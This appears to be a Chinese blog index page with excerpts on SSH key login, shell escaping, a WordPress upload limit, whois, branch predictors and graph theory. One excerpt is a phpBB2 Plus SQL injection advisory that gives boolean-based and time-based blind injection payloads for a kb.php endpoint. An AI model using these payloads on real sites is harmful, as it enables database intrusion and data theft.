近来查看Digital Ocean的Droplet登陆日志,发现用作梯子节点的Droplet经常受到来自江苏连云港某IP的SSH密码穷举攻击。
于是博主关闭了该Droplet的SSH密码登录,改用密钥对登录,以杜绝穷举攻击的可能。
使用密钥对登陆,需要创建一个新的SSH密钥对(包含公钥和私钥,公钥提供给VPS服务商,私钥用于登录),我们用Linux系统自带的ssh-keygen命令来生成这个密钥对。
/root/.ssh/目录用来存储Linux系统生成的SSH密钥对,我们首先检查一下,该目录是否为空。
$ cd ~/.ssh $ ls
若该目录里已经有(filename).pub和(filename)这样的同名文件对,则代表已经有生成好的秘钥对。如果不知道已经存在的密钥对的用途,请不要随意覆盖或删除。
我们现在用ssh-keygen命令创建新的密钥对:
$ ssh-keygen
使用cd命令处理含空格的目录名时,在目录名中的空格前加入转义符“\”即可。
例如,当前目录中,若目标文件夹名为Google Drive,命令即为:
$ cd Google\ Drive
需注意文件夹名称大小写区分。
空格符号是类Unix系统的保留符号,有特殊含义,为与其区分,需在命令中的一般字符空格前加入转义符“\”。
打开/wp-content/plugins/all-in-one-wp-migration/constants.php
行199:201定义文件上传大小限制,修改数字即可,单位为Byte。
请在FTP环境下修改,WordPress自带修改器可能会导致未知语法问题。
// ================= // = Max File Size = // ================= define( 'AI1WM_MAX_FILE_SIZE', 536870912 ); // 512MB
// ================= // = Max File Size = // ================= define( 'AI1WM_MAX_FILE_SIZE', 4294967296 ); // 4GB
根据需求修改即可。
漏洞来源:
漏洞分析:
phpBB2 Plus SQL注入漏洞,因未在SQL查询中过滤用户提供的数据。攻击者可能利用此漏洞破坏网站数据库,访问或修改数据,或者近一步利用底层数据库中的潜在漏洞。
影响版本:
phpBB2 Plus 1.53和其他版本
注入链接:
http://www.example.com/kb.php?mode=cat&cat=0
注入类型:
Type: boolean-based blind – OR boolean-based blind – WHERE or HAVING clause (MySQL comment)
Payload: mode=cat&cat=-3951 OR 7858=7858#
Type: AND/OR time-based blind – MySQL >= 5.0.12 OR time-based blind
Payload: mode=cat&cat=-1 OR SLEEP(5)
Debian/Ubuntu下安装命令如下:
$ apt-get install -y whois
CentOS下安装命令如下
$ yum install -y whois
查询命令如下:
$ whois hannesgao.de
结果如下:
Domain: hannesgao.de Nserver: ns1035.ui-dns.de Nserver: ns1046.ui-dns.biz Nserver: ns1046.ui-dns.com Nserver: ns1112.ui-dns.org Status: connect Changed: 2017-07-06T13:14:17+02:00 [Tech-C] Type: ROLE Name: Hostmaster EINSUNDEINS Organisation: 1&1 Internet AG Address: Brauerstr. 48 PostalCode: 76135 City: Karlsruhe CountryCode: DE Phone: +49.7219600 Fax: +49.72191374248 Email: [email protected] Changed: 2012-12-10T20:50:22+01:00 [Zone-C] Type: ROLE Name: Hostmaster EINSUNDEINS Organisation: 1&1 Internet AG Address: Brauerstr. 48 PostalCode: 76135 City: Karlsruhe CountryCode: DE Phone: +49.7219600 Fax: +49.72191374248 Email: [email protected] Changed: 2012-12-10T20:50:22+01:00
首先吐槽Rechnerstruktur这门课懒惰的教授:Prof. Dr. Wolfgang Karl。老头子Folien不改动直接改日期拿来用就不提了,Korrelationsprädiktor这么重要的考试内容居然在Folien上只给了个名字,Übungsblatt里面这个题让我查资料查了两个多小时才搞懂。
正文开始:
(m, n)-关联-分支预测器是由以下两个部分组成:
一个m位-全局分支历史寄存器 (BHR: Branch History Register)
由m位移位寄存器构成,用于记录当前跳转的前m个实际分支行为历史,每一位用来记录该分支是否实际被执行,1对应实际执行,0对应实际未执行。
一个含有2^m个条目(Eintrag)的模式历史表 (PHT: Pattern History Table),每个条目对应一个n位-简单预测器。
树的定义:
如果一个无向简单图G满足以下相互等价的条件之一,那么G是一棵树:
1. G是没有回路的连通图。
2. G没有回路,但是在G内添加任意一条边,就会形成一个回路。
3. G是连通的,但是如果去掉任意一条边,就不再连通。
4. G内的任意两个顶点能被唯一路径所连通。 继续阅读图论:树,图的生成树
概念:
1. 连通:在一个无向图G中,若从顶点v_i到顶点v_j有路径相连(当然从v_j到v_i也一定有路径),则称v_i和v_j是连通的。如果G是有向图,那么连接v_i和v_j的路径中所有的边都必须同向。
2. 连通图:如果图中任意两点都是连通的,那么图被称作连通图。
3. 强连通图:有向图G = (V,E)中,若对于V中任意两个不同的顶点x和y,都存在从x到y以及从y到x的路径,则称G是强连通图。
4. 连通分量:无向图G的一个极大连通子图称为G的一个连通分量(或连通分支)。连通图只有一个连通分量,即其自身;非连通的无向图有多个连通分量。
解析:
对于一个无向图,说强联通没有意义,因为此时强连通就是连通。
而对于一个有向图,它不一定是强连通的,但可以分为几个极大的强连通子图(“极大”的意思是再加入任何一个顶点就不满足强连通了)。这些子图叫做这个有向图的强连通分量。
强连通图只有一个强连通分量,即是其自身;非强连通的有向图有多个强连通分量,且多个强连通分量之间没有共享边及共享节点。
任意一个强连通分量都至少包含一个有向环。